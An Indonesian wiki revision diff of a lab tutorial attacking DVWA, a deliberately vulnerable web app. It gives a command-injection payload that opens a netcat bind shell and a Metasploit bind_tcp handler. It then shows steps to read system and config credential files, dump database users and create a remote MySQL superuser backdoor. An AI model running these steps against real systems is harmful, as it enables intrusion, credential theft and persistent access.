Difference between revisions of "DVWA: Exploit menggunakan Metasploit"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
(4 intermediate revisions by the same user not shown) | |||
Line 22: | Line 22: | ||
Dimana 192.168.0.100 adalah IP address server DVWA | Dimana 192.168.0.100 adalah IP address server DVWA | ||
+ | |||
+ | Teknik ini akan membuka server pada port 4444 menggunakan NC .... | ||
+ | Ini tempat masuk bagi Metasploit. | ||
==Gunakan metasploit== | ==Gunakan metasploit== | ||
Line 55: | Line 58: | ||
Cari password database | Cari password database | ||
− | ls -l /var/www/html/ | + | ls -l /var/www/html/DVWA-1.9/config |
− | cat /var/www/html/ | + | cat /var/www/html/DVWA-1.9/config/config.inc.php |
− | Explorasi database | + | Explorasi database, asumsi username MySQL root, password 123456 |
− | echo "show databases;" | mysql -uroot - | + | echo "show databases;" | mysql -uroot -p123456 |
− | echo "use dvwa; show tables;" | mysql -uroot - | + | echo "use dvwa; show tables;" | mysql -uroot -p123456 |
− | echo "use dvwa; desc users;" | mysql -uroot - | + | echo "use dvwa; desc users;" | mysql -uroot -p123456 |
− | echo "select * from dvwa.users;" | mysql -uroot - | + | echo "select * from dvwa.users;" | mysql -uroot -p123456 |
Buat user baru | Buat user baru | ||
− | echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot - | + | echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456 |
− | echo "select * from dvwa.users;" | mysql -uroot - | + | echo "select * from dvwa.users;" | mysql -uroot -p123456 |
Lihat informasi tabel MySQL | Lihat informasi tabel MySQL | ||
− | echo "show databases;" | mysql -uroot - | + | echo "show databases;" | mysql -uroot -p123456 |
− | echo "use mysql; show tables;" | mysql -uroot - | + | echo "use mysql; show tables;" | mysql -uroot -p123456 |
+ | |||
+ | Ini bagian paling berbahaya, buat user MySQL yang baru | ||
+ | |||
+ | echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456 | ||
+ | echo "select * from mysql.user;" | mysql -uroot -p123456 | ||
+ | |||
+ | Perintah diatas akan membuat user db_hacker yang bisa akses dari mana saja (%), dengan password abc123 ke MySQL :( .. | ||
− | + | ==Cek dari console Kali Linux== | |
− | + | mysql -u db_hacker -h 192.168.0.100 -pabc123 | |
− | + | show databases; | |
+ | quit | ||
==Referensi== | ==Referensi== | ||
* https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html | * https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html |
Latest revision as of 04:18, 4 May 2017
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
Persiapan
Masuk ke DVWA, misalnya
http://192.168.0.80/DVWA-1.9
username admin password password
Klik
DVWA Security > Security Level Low > Submit
Siapkan NetCat
Masuk ke DVWA Command Injection, lakukan
192.168.0.100;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Dimana 192.168.0.100 adalah IP address server DVWA
Teknik ini akan membuka server pada port 4444 menggunakan NC .... Ini tempat masuk bagi Metasploit.
Gunakan metasploit
Jalankan
msfconsole thankyou
Lakukan
use multi/handler set PAYLOAD linux/x86/shell/bind_tcp show options set RHOST 192.168.0.100 exploit
Cek password
whoami grep www-data /etc/passwd grep www-data /etc/group
Cek Password melalui konfigurasi Web
ps -eaf | grep http pwd ls -ld /var/www/html ls -ld /var/www/html/DVWA* ls -l /var/www/html/DVWA*
Cari password database
ls -l /var/www/html/DVWA-1.9/config cat /var/www/html/DVWA-1.9/config/config.inc.php
Explorasi database, asumsi username MySQL root, password 123456
echo "show databases;" | mysql -uroot -p123456 echo "use dvwa; show tables;" | mysql -uroot -p123456 echo "use dvwa; desc users;" | mysql -uroot -p123456 echo "select * from dvwa.users;" | mysql -uroot -p123456
Buat user baru
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -p123456 echo "select * from dvwa.users;" | mysql -uroot -p123456
Lihat informasi tabel MySQL
echo "show databases;" | mysql -uroot -p123456 echo "use mysql; show tables;" | mysql -uroot -p123456
Ini bagian paling berbahaya, buat user MySQL yang baru
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -p123456 echo "select * from mysql.user;" | mysql -uroot -p123456
Perintah diatas akan membuat user db_hacker yang bisa akses dari mana saja (%), dengan password abc123 ke MySQL :( ..
Cek dari console Kali Linux
mysql -u db_hacker -h 192.168.0.100 -pabc123 show databases; quit